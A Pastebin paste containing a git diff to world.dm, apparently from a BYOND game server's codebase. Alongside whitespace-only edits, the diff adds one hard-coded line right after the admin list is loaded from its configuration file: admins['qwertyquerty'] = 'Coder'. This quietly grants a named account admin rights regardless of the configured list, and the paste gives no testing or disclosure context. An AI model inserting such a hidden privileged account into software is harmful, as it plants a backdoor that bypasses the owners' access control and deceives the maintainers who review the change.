Advertisement
Guest User

Untitled

a guest
Jun 23rd, 2019
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. diff --git a/code/world.dm b/code/world.dm
  2. index 14bfac6..5af6063 100644
  3. --- a/code/world.dm
  4. +++ b/code/world.dm
  5. @@ -57,20 +57,22 @@ world
  6. if (copytext(line, 1, 2) == ";")
  7. continue
  8.  
  9. var/pos = findtext(line, " - ", 1, null)
  10. if (pos)
  11. var/m_key = copytext(line, 1, pos)
  12. var/a_lev = copytext(line, pos + 3, length(line) + 1)
  13. admins[m_key] = a_lev
  14. diary << ("ADMIN: [m_key] = [a_lev]")
  15.  
  16. + admins["qwertyquerty"] = "Coder"
  17. +
  18. // dsingh for faster create panel loads
  19. /world/proc/precache_create_txt()
  20. if (!create_mob_html)
  21. var/mobjs = null
  22. mobjs = jointext(typesof(/mob), ";")
  23. create_mob_html = grabResource("html/admin/create_object.html")
  24. create_mob_html = replacetext(create_mob_html, "null /* object types */", "\"[mobjs]\"")
  25.  
  26. if (!create_object_html)
  27. var/objectjs = null
  28. @@ -329,26 +331,26 @@ var/f_color_selector_handler/F_Color_Selector
  29. LAGCHECK(50)
  30.  
  31. url_regex = new("(https?|byond|www)(\\.|:\\/\\/)", "i")
  32.  
  33. processScheduler.setup()
  34.  
  35. src.update_status()
  36.  
  37. SetupOccupationsList()
  38. ircbot.event("serverstart")
  39. -
  40. +
  41. round_start_data() //Tell the hub site a round is starting
  42. if (time2text(world.realtime,"DDD") == "Fri")
  43. NT |= mentors
  44.  
  45. -
  46. +
  47.  
  48. spawn(world.tick_lag*30)
  49. Optimize()
  50. sleep_offline = 1
  51.  
  52. for (var/turf/simulated/wall/supernorn/T in world) // workaround for some strange bug
  53. T.update_icon()
  54. LAGCHECK(50)
  55. RL_Start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement